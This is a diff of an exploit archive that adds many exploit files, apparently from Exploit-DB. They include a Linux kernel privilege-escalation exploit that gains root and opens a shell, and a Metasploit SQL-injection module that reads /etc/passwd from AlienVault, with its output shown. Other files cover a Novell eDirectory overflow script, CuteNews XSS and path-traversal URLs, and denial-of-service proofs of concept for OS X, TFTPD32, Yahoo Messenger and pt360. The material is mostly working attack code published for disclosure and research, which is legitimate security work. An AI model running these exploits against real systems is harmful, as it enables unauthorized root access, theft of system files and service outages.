int __attribute__((regparm(3)))
|
||||
kernel_code()
|
||||
{
|
||||
commit_creds(prepare_kernel_cred(0));
|
||||
return -1;
|
||||
}
|
||||
|
||||
int jump_payload_not_used(void *skb, void *nlh)
|
||||
{
|
||||
asm volatile (
|
||||
"mov $kernel_code, %eax\n"
|
||||
"call *%eax\n"
|
||||
);
|
||||
}
|
||||
|
||||
unsigned long
|
||||
get_symbol(char *name)
|
||||
{
|
||||
FILE *f;
|
||||
unsigned long addr;
|
||||
char dummy, sym[512];
|
||||
int ret = 0;
|
||||
|
||||
f = fopen("/proc/kallsyms", "r");
|
||||
if (!f) {
|
||||
return 0;
|
||||
}
|
||||
|
||||
while (ret != EOF) {
|
||||
ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
|
||||
if (ret == 0) {
|
||||
fscanf(f, "%s\n", sym);
|
||||
continue;
|
||||
}
|
||||
if (!strcmp(name, sym)) {
|
||||
printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
|
||||
fclose(f);
|
||||
return addr;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int main(int argc, char*argv[])
|
||||
{
|
||||
int fd;
|
||||
unsigned family;
|
||||
struct {
|
||||
struct nlmsghdr nlh;
|
||||
struct unix_diag_req r;
|
||||
} req;
|
||||
char buf[8192];
|
||||
|
||||
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
|
||||
printf("Can't create sock diag socket\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
memset(&req, 0, sizeof(req));
|
||||
req.nlh.nlmsg_len = sizeof(req);
|
||||
req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
|
||||
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
|
||||
req.nlh.nlmsg_seq = 123456;
|
||||
|
||||
//req.r.sdiag_family = 89;
|
||||
req.r.udiag_states = -1;
|
||||
req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
|
||||
|
||||
if(argc==1){
|
||||
printf("Run: %s Fedora|Ubuntu\n",argv[0]);
|
||||
return 0;
|
||||
}
|
||||
else if(strcmp(argv[1],"Fedora")==0){
|
||||
commit_creds = (_commit_creds) get_symbol("commit_creds");
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
|
||||
sock_diag_handlers = get_symbol("sock_diag_handlers");
|
||||
nl_table = get_symbol("nl_table");
|
||||
|
||||
if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
|
||||
printf("some symbols are not available!\n");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
family = (nl_table - sock_diag_handlers) / 4;
|
||||
printf("family=%d\n",family);
|
||||
req.r.sdiag_family = family;
|
||||
|
||||
if(family>255){
|
||||
printf("nl_table is too far!\n");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
else if(strcmp(argv[1],"Ubuntu")==0){
|
||||
commit_creds = (_commit_creds) 0xc106bc60;
|
||||
prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
|
||||
req.r.sdiag_family = 81;
|
||||
}
|
||||
|
||||
unsigned long mmap_start, mmap_size;
|
||||
mmap_start = 0x10000;
|
||||
mmap_size = 0x120000;
|
||||
printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
|
||||
|
||||
if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
|
||||
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
|
||||
printf("mmap fault\n");
|
||||
exit(1);
|
||||
}
|
||||
memset((void*)mmap_start, 0x90, mmap_size);
|
||||
|
||||
char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
|
||||
unsigned long *asd = &jump[4];
|
||||
*asd = (unsigned long)kernel_code;
|
||||
|
||||
memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
|
||||
|
||||
if ( send(fd, &req, sizeof(req), 0) < 0) {
|
||||
printf("bad send\n");
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
printf("uid=%d, euid=%d\n",getuid(), geteuid() );
|
||||
|
||||
if(!getuid())
|
||||
system("/bin/sh");
|
||||
|
||||
}
|
12
platforms/linux/remote/33339.txt
Executable file
12
platforms/linux/remote/33339.txt
Executable file
|
@ -0,0 +1,12 @@
|
|||
source: http://www.securityfocus.com/bid/36958/info
|
||||
|
||||
|
||||
CUPS is prone to a cross-site scripting vulnerability because the software fails to sufficiently sanitize user-supplied input.
|
||||
|
||||
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
|
||||
|
||||
NOTE: This vulnerability was originally reported in BID 36956 (Apple Mac OS X 2009-006 Multiple Security Vulnerabilities), but has been given its own record to better document it.
|
||||
|
||||
This issue affects versions prior to CUPS 1.4.2.
|
||||
|
||||
http://www.example.com/admin/?kerberos=onmouseover=alert
|
72
platforms/novell/remote/33351.pl
Executable file
72
platforms/novell/remote/33351.pl
Executable file
|
@ -0,0 +1,72 @@
|
|||
source: http://www.securityfocus.com/bid/37009/info
|
||||
|
||||
Novell eDirectory is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
|
||||
|
||||
Attackers can exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.
|
||||
|
||||
Novell eDirectory 8.8 SP5 is vulnerable; other versions may also be affected.
|
||||
|
||||
#!usr\bin\perl
|
||||
#Vulnerability has found by HACKATTACK
|
||||
|
||||
use WWW::Mechanize;
|
||||
|
||||
use LWP::Debug qw(+);
|
||||
|
||||
use HTTP::Cookies;
|
||||
|
||||
$address=$ARGV[0];
|
||||
|
||||
|
||||
if(!$ARGV[0]){
|
||||
|
||||
print "Usage:perl $0 address\n";
|
||||
|
||||
exit();
|
||||
}
|
||||
|
||||
|
||||
|
||||
$login = "$address/_LOGIN_SERVER_";
|
||||
|
||||
$url = "$address/dhost/";
|
||||
|
||||
$module = "modules?I:";
|
||||
|
||||
$buffer = "A" x 2000;
|
||||
|
||||
|
||||
$vuln = $module.$buffer;
|
||||
|
||||
#Edit the username and password.
|
||||
|
||||
$user = "username";
|
||||
|
||||
$pass = "password";
|
||||
|
||||
#Edit the username and password.
|
||||
|
||||
my $mechanize = WWW::Mechanize->new();
|
||||
|
||||
|
||||
$mechanize->cookie_jar(HTTP::Cookies->new(file => "$cookie_file",autosave => 1));
|
||||
|
||||
|
||||
$mechanize->timeout($url_timeout);
|
||||
|
||||
$res = $mechanize->request(HTTP::Request->new('GET', "$login"));
|
||||
|
||||
|
||||
$mechanize->submit_form(
|
||||
|
||||
form_name => "authenticator",
|
||||
|
||||
fields => {
|
||||
|
||||
usr => $user,
|
||||
|
||||
pwd => $pass},
|
||||
|
||||
button => 'Login');
|
||||
|
||||
$response2 = $mechanize->get("$url$vuln");
|
57
platforms/osx/dos/33337.c
Executable file
57
platforms/osx/dos/33337.c
Executable file
|
@ -0,0 +1,57 @@
|
|||
source: http://www.securityfocus.com/bid/36915/info
|
||||
|
||||
Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition.
|
||||
|
||||
Exploiting this issue allows local, unprivileged users to crash affected kernels, denying further service to legitimate users.
|
||||
|
||||
/*
|
||||
Mac OS X 10.5.6/10.5.7 ptrace() mutex handling DoS
|
||||
==================================================
|
||||
This code should be run in a loop and due to problems
|
||||
with mutex handling in ptrace a DoS can occur when a
|
||||
destroyed mutex is attempted to be interlocked by OSX
|
||||
kernel giving rise to a race condition. You may need
|
||||
to run this code multiple times.
|
||||
|
||||
- Tested against 10.5.6
|
||||
- Tested against 10.5.7
|
||||
|
||||
while `true`;do ./prdelka-vs-APPLE-ptracepanic;done
|
||||
|
||||
This code is dedicated to a friend who I met in this
|
||||
place. Long live the exploit scene. R.I.P str0ke.
|
||||
|
||||
-- prdelka
|
||||
*/
|
||||
#include <sys/types.h>
|
||||
#include <sys/ptrace.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
|
||||
int main(){
|
||||
pid_t pid;
|
||||
char *argv[] = {"id","","",0};
|
||||
char *envp[] = {"",0};
|
||||
pid = fork();
|
||||
if(pid == 0){
|
||||
usleep(100);
|
||||
execve("/usr/bin/id",argv,envp);
|
||||
}
|
||||
else{
|
||||
usleep(820);
|
||||
if(ptrace(PT_ATTACH,pid,0,0)==0){
|
||||
printf("[ PID: %d has been caught!\n",pid);
|
||||
if(ptrace(PT_DETACH,pid,0,0)<0){
|
||||
perror("Evil happens.");
|
||||
}
|
||||
usleep(1);
|
||||
wait(0);
|
||||
}
|
||||
else{
|
||||
perror("Fail!");
|
||||
}
|
||||
}
|
||||
return(0);
|
||||
}
|
||||
|
264
platforms/php/webapps/33317.txt
Executable file
264
platforms/php/webapps/33317.txt
Executable file
|
@ -0,0 +1,264 @@
|
|||
Exploit Title: AlienVault newpolicyform.php SQLi
|
||||
Date: 5/9/2014
|
||||
Exploit Author: chrisdhebert[at]gmail.com
|
||||
Vendor Homepage: http://www.alienvault.com/
|
||||
Software Link: http://www.alienvault.com/free-downloads-services
|
||||
Version: 4.6.1 and below
|
||||
Tested on: Linux
|
||||
CVE : n/a
|
||||
Vendor Security Advisory : AV-11394 http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower
|
||||
|
||||
Timeline:
|
||||
--------
|
||||
4/14/2014 (Vulnerablity Discovered)
|
||||
4/17/2014 (Vendor Informed with receipt)
|
||||
5/5/2014 (Vendor Patch Released v4.7.0)
|
||||
5/9/2014 (Public Release)
|
||||
|
||||
Vendor Discription:
|
||||
------------------
|
||||
OSSIM is the most widely used SIEM offering, thanks in no small part to the open source
|
||||
community that has promoted its use. OSSIM provides all of the capabilities that a security
|
||||
professional needs from a SIEM offering, event collection, normalization, correlation and
|
||||
incident response - but it also does far more. Not simply satisfied with integrating data
|
||||
from existing security tools, OSSIM is built on the Unified Security Management platform
|
||||
which provides a common framework for the deployment, configuration, and management of your
|
||||
security tools.
|
||||
|
||||
Vulnerability Details:
|
||||
---------------------
|
||||
The vulnerability can be classified as "SQL Injection" from authenticated users. No input validation is performed when processing parameters on the following request:
|
||||
GET /ossim/policy/newpolicyform.php?insertafter='SQLi HTTP/1.1
|
||||
|
||||
Although this POC demonstrates READ access to files readable by u=mysql g=root o=all (such as /etc/passwd). It should be noted that, an attacker should be able to WRITE to a new file with sufficient permissions such as /tmp/newfile. After a quick search, exploiting this may be midigated by the current file permissions of /usr/share/*ossim/www/* and other vhosts handled by apache. For those with more time, other writeable locations could be leveraged with this vulnerablity.
|
||||
|
||||
|
||||
Metasploit Module:
|
||||
-----------------
|
||||
##
|
||||
## This module requires Metasploit: http//metasploit.com/download
|
||||
## Current source: https://github.com/rapid7/metasploit-framework
|
||||
###
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
'Name' => "AlienVault Authenticated SQL Injection Arbitrary File Read",
|
||||
'Description' => %q{
|
||||
AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against
|
||||
newpolicyform.php using the 'insertinto' parameter. This module exploits the
|
||||
lack of input filtering to read an arbitrary file from the file system.
|
||||
Any authenticated user is able to exploit this, as administrator
|
||||
privileges are not required.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Chris Hebert <chrisdhebert[at]gmail.com>'
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
['EDB', '#####TBD####']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Platform' => ['linux'],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "May 9 2014"))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd' ]),
|
||||
OptString.new('USERNAME', [ true, 'Single username' ]),
|
||||
OptString.new('PASSWORD', [ true, 'Single password' ]),
|
||||
OptString.new('TARGETURI', [ true, 'Relative URI of installation', '/' ])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
print_status("#{peer} - Get a valid session cookie...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php')
|
||||
})
|
||||
|
||||
unless res and res.code == 200
|
||||
print_error("#{peer} - Server did not respond in an expected way")
|
||||
return
|
||||
end
|
||||
|
||||
cookie = res.get_cookies
|
||||
|
||||
if cookie.blank?
|
||||
print_error("#{peer} - Could not retrieve a cookie")
|
||||
return
|
||||
end
|
||||
|
||||
post = {
|
||||
'embed' => '',
|
||||
'bookmark_string' => '',
|
||||
'user' => datastore['USERNAME'],
|
||||
'passu' => datastore['PASSWORD'],
|
||||
'pass' => Rex::Text.encode_base64(datastore['PASSWORD'])
|
||||
}
|
||||
|
||||
print_status("#{peer} - Login...")
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ossim', 'session', 'login.php'),
|
||||
'method' => 'POST',
|
||||
'vars_post' => post,
|
||||
'cookie' => cookie
|
||||
})
|
||||
|
||||
unless res and res.code == 302
|
||||
print_error("#{peer} - Server did not respond in an expected way")
|
||||
return
|
||||
end
|
||||
|
||||
unless res.headers['Location'] && res.headers['Location'] == normalize_uri(target_uri.path, 'ossim/')
|
||||
print_error("#{peer} - Authentication failed")
|
||||
return
|
||||
end
|
||||
|
||||
cookie = res.get_cookies
|
||||
|
||||
if cookie.blank?
|
||||
print_error("#{peer} - Could not retrieve the authenticated cookie")
|
||||
return
|
||||
end
|
||||
|
||||
i = 0
|
||||
full = ''
|
||||
filename = datastore['FILEPATH'].unpack("H*")[0]
|
||||
i = 0
|
||||
full = ''
|
||||
filename = datastore['FILEPATH'].unpack("H*")[0]
|
||||
left_marker = Rex::Text.rand_text_alpha(6)
|
||||
right_marker = Rex::Text.rand_text_alpha(6)
|
||||
|
||||
print_status("#{peer} - Exploiting SQLi...")
|
||||
|
||||
loop do
|
||||
file = sqli(left_marker, right_marker, i, cookie, filename)
|
||||
return if file.nil?
|
||||
break if file.empty?
|
||||
|
||||
str = [file].pack("H*")
|
||||
full << str
|
||||
vprint_status(str)
|
||||
|
||||
i = i+1
|
||||
end
|
||||
|
||||
path = store_loot('alienvault.file', 'text/plain', datastore['RHOST'], full, datastore['FILEPATH'])
|
||||
print_good("File stored at path: " + path)
|
||||
end
|
||||
|
||||
def sqli(left_marker, right_marker, i, cookie, filename)
|
||||
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
|
||||
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
|
||||
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
|
||||
pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
|
||||
|
||||
get = {
|
||||
'insertafter' => pay,
|
||||
}
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'ossim', 'policy', 'newpolicyform.php'),
|
||||
'cookie' => cookie,
|
||||
'vars_get' => get
|
||||
})
|
||||
|
||||
if res and res.body and res.body =~ /#{left_marker}(.*)#{right_marker}/
|
||||
return $1
|
||||
else
|
||||
print_error("Server did not respond in an expected way")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
||||
|
||||
Metasploit Module Use Example:
|
||||
-----------------------------
|
||||
msf > use auxiliary/gather/alienvault_newpolicyform_sqli
|
||||
msf auxiliary(alienvault_newpolicyform_sqli) > show options
|
||||
|
||||
Module options (auxiliary/gather/alienvault_newpolicyform_sqli):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FILEPATH /etc/passwd yes Path to remote file
|
||||
PASSWORD putpasswordhere yes Single password
|
||||
Proxies no Use a proxy chain
|
||||
RHOST 192.168.1.1 yes The target address
|
||||
RPORT 443 yes The target port
|
||||
TARGETURI / yes Relative URI of installation
|
||||
USERNAME admin yes Single username
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
msf auxiliary(alienvault_newpolicyform_sqli) > run
|
||||
|
||||
[*] 192.168.1.1:443 - Get a valid session cookie...
|
||||
[*] 192.168.1.1:443 - Login...
|
||||
[*] 192.168.1.1:443 - Exploiting SQLi...
|
||||
[+] File stored at path: /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(alienvault_newpolicyform_sqli) > cat /home/user/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
|
||||
[*] exec: cat /home/username/.msf4/loot/20140416053929_default_192.168.1.1_alienvault.file_945139.txt
|
||||
|
||||
root:x:0:0:root:/root:/usr/bin/llshell
|
||||
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|
||||
bin:x:2:2:bin:/bin:/bin/sh
|
||||
sys:x:3:3:sys:/dev:/bin/sh
|
||||
sync:x:4:65534:sync:/bin:/bin/sync
|
||||
games:x:5:60:games:/usr/games:/bin/sh
|
||||
man:x:6:12:man:/var/cache/man:/bin/sh
|
||||
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|
||||
mail:x:8:8:mail:/var/mail:/bin/sh
|
||||
news:x:9:9:news:/var/spool/news:/bin/sh
|
||||
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|
||||
proxy:x:13:13:proxy:/bin:/bin/sh
|
||||
www-data:x:33:33:www-data:/var/www:/bin/sh
|
||||
backup:x:34:34:backup:/var/backups:/bin/sh
|
||||
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|
||||
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|
||||
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|
||||
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|
||||
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
|
||||
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
|
||||
munin:x:102:104::/var/lib/munin:/bin/false
|
||||
postfix:x:103:106::/var/spool/postfix:/bin/false
|
||||
snmp:x:104:108::/var/lib/snmp:/bin/false
|
||||
hacluster:x:105:109:Heartbeat System Account,,,:/usr/lib/heartbeat:/bin/false
|
||||
avserver:x:106:111:AlienVault SIEM,,,:/home/avserver:/bin/false
|
||||
avapi:x:107:111:AlienVault SIEM,,,:/home/avapi:/bin/bash
|
||||
avidm:x:108:111:AlienVault IDM,,,:/home/avidm:/bin/false
|
||||
ossec:x:1000:1000::/var/ossec/:/bin/false
|
||||
ossecm:x:1001:1000::/var/ossec/:/bin/false
|
||||
ossecr:x:1002:1000::/var/ossec/:/bin/false
|
||||
ntop:x:109:112::/var/lib/ntop:/bin/false
|
||||
avagent:x:110:111:AlienVault Agent,,,:/home/avagent:/bin/false
|
||||
snort:x:111:113:Snort IDS:/var/log/snort:/bin/false
|
||||
prads:x:112:114::/home/prads:/bin/false
|
||||
nagios:x:113:115::/var/lib/nagios:/bin/false
|
||||
stunnel4:x:114:116::/var/run/stunnel4:/bin/false
|
||||
rabbitmq:x:115:117:RabbitMQ messaging server,,,:/var/lib/rabbitmq:/bin/false
|
||||
mysql:x:116:118:MySQL Server,,,:/var/lib/mysql:/bin/false
|
||||
|
||||
msf auxiliary(alienvault_newpolicyform_sqli) >
|
||||
|
||||
|
22
platforms/php/webapps/33340.txt
Executable file
22
platforms/php/webapps/33340.txt
Executable file
|
@ -0,0 +1,22 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/index.php?lastusername='%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=%3Cscript%3Ealert(/xss/)%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&cat_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source_msg=%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&postponed_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&unapproved_selected=%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&news_per_page=%3Cscript%3Ealert(/xss/);%3C/script%3E
|
16
platforms/php/webapps/33341.txt
Executable file
16
platforms/php/webapps/33341.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/search.php?dosearch=yes&from_date_day=a&from_date_month=5&from_date_year=2003&to_date_day=4&to_date_month=5&to_date_year=2010
|
18
platforms/php/webapps/33342.txt
Executable file
18
platforms/php/webapps/33342.txt
Executable file
|
@ -0,0 +1,18 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/search.php?user=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
http://www.example.com/test/cutenews/search.php?title=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E
|
||||
|
16
platforms/php/webapps/33343.txt
Executable file
16
platforms/php/webapps/33343.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/register.php?result=%3Cscript%3Ealert(/XSS/);%3C/script%3E
|
16
platforms/php/webapps/33344.txt
Executable file
16
platforms/php/webapps/33344.txt
Executable file
|
@ -0,0 +1,16 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/index.php?mod=addnews&action=addnews
|
17
platforms/php/webapps/33345.txt
Executable file
17
platforms/php/webapps/33345.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
source: http://www.securityfocus.com/bid/36971/info
|
||||
|
||||
CuteNews and UTF-8 CuteNews are prone to multiple vulnerabilities, including cross-site scripting, HTML-injection, information-disclosure, arbitrary-script-injection, and security-bypass issues.
|
||||
|
||||
Note that exploits for some of the issues may require administrator privilege.
|
||||
|
||||
Successful exploits may allow attackers to:
|
||||
- obtain sensitive information
|
||||
- gain unauthorized access to the affected application
|
||||
- run arbitrary script code in the browser of an unsuspecting user in the context of the affected site
|
||||
- hijack user sessions
|
||||
- execute arbitrary commands in the context of the webserver process
|
||||
|
||||
A successful attack will compromise the application and may aid in further attacks.
|
||||
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=list&source=../users.db.php%00
|
||||
http://www.example.com/test/cutenews/index.php?mod=editnews&action=editnews&id=1255182669&source=../users.db.php%00
|
39
platforms/windows/dos/33348.pl
Executable file
39
platforms/windows/dos/33348.pl
Executable file
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
|
||||
# Date: 13/05/2014
|
||||
# Exploit Author: j0s3h4x0r
|
||||
# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
|
||||
# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
|
||||
# Version: 4.5 32 bits / 4.5 64 bits
|
||||
# Tested on: [Windows 7 x64]
|
||||
|
||||
#this proof of concept code will crash tftpd32 and tftpd64
|
||||
#you can try changing $j and $i loop limits
|
||||
#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
|
||||
#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
|
||||
|
||||
## Exploit-DB Note: $j=5, $i=2500 caused a crash.
|
||||
|
||||
|
||||
|
||||
#!/usr/bin/perl -w
|
||||
|
||||
use IO::Socket;
|
||||
|
||||
for (my $j = 0; $j < 2; $j++)
|
||||
{
|
||||
sleep(2);
|
||||
for (my $i = 0; $i < 1500; $i++)
|
||||
{
|
||||
$st_socket = IO::Socket::INET->new(Proto=>'udp', PeerAddr=>'127.0.0.1', PeerPort=>69) or die "connect error";
|
||||
|
||||
$p_c_buffer = "\x0c\x0d" x 10;
|
||||
|
||||
print $st_socket $p_c_buffer;
|
||||
|
||||
close($st_socket);
|
||||
|
||||
print "sent " . $i . "\n";
|
||||
}
|
||||
}
|
||||
|
||||
exit;
|
26
platforms/windows/dos/33350.xml
Executable file
26
platforms/windows/dos/33350.xml
Executable file
|
@ -0,0 +1,26 @@
|
|||
source: http://www.securityfocus.com/bid/37007/info
|
||||
|
||||
Yahoo! Messenger is prone to a denial-of-service vulnerability because of a NULL-pointer dereference error.
|
||||
|
||||
A successful attack allows a remote attacker to crash the application using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
|
||||
|
||||
Yahoo! Messenger 9.0.0.2162 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?XML version='1.0' standalone='yes' ?>
|
||||
|
||||
<package><job id='DoneInVBS' debug='false' error='true'>
|
||||
|
||||
<object classid='clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86' id='target' />
|
||||
|
||||
<script language='vbscript'>
|
||||
|
||||
|
||||
arg1=String(11284, "A")
|
||||
|
||||
target.RegisterMe arg1
|
||||
|
||||
</script>
|
||||
|
||||
</job>
|
||||
|
||||
</package>
|
|
@ -1,24 +1,24 @@
|
|||
#!/usr/bin/python
|
||||
# PacketTrap Networks pt360 2.0.39 TFTPD Remote DOS
|
||||
# Coded by Mati Aharoni
|
||||
# muts..at..offensive-security.com
|
||||
# http://www.offensive-security.com/0day/pt360dos.py.txt
|
||||
|
||||
import socket
|
||||
import sys
|
||||
|
||||
host = '172.16.167.134'
|
||||
port = 69
|
||||
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||||
except:
|
||||
print "socket() failed"
|
||||
sys.exit(1)
|
||||
|
||||
filename = '"'*160
|
||||
mode = "netascii"
|
||||
muha = "\x00\x02" + filename + "\0" + mode + "\0"
|
||||
s.sendto(muha, (host, port))
|
||||
|
||||
# milw0rm.com [2008-03-26]
|
||||
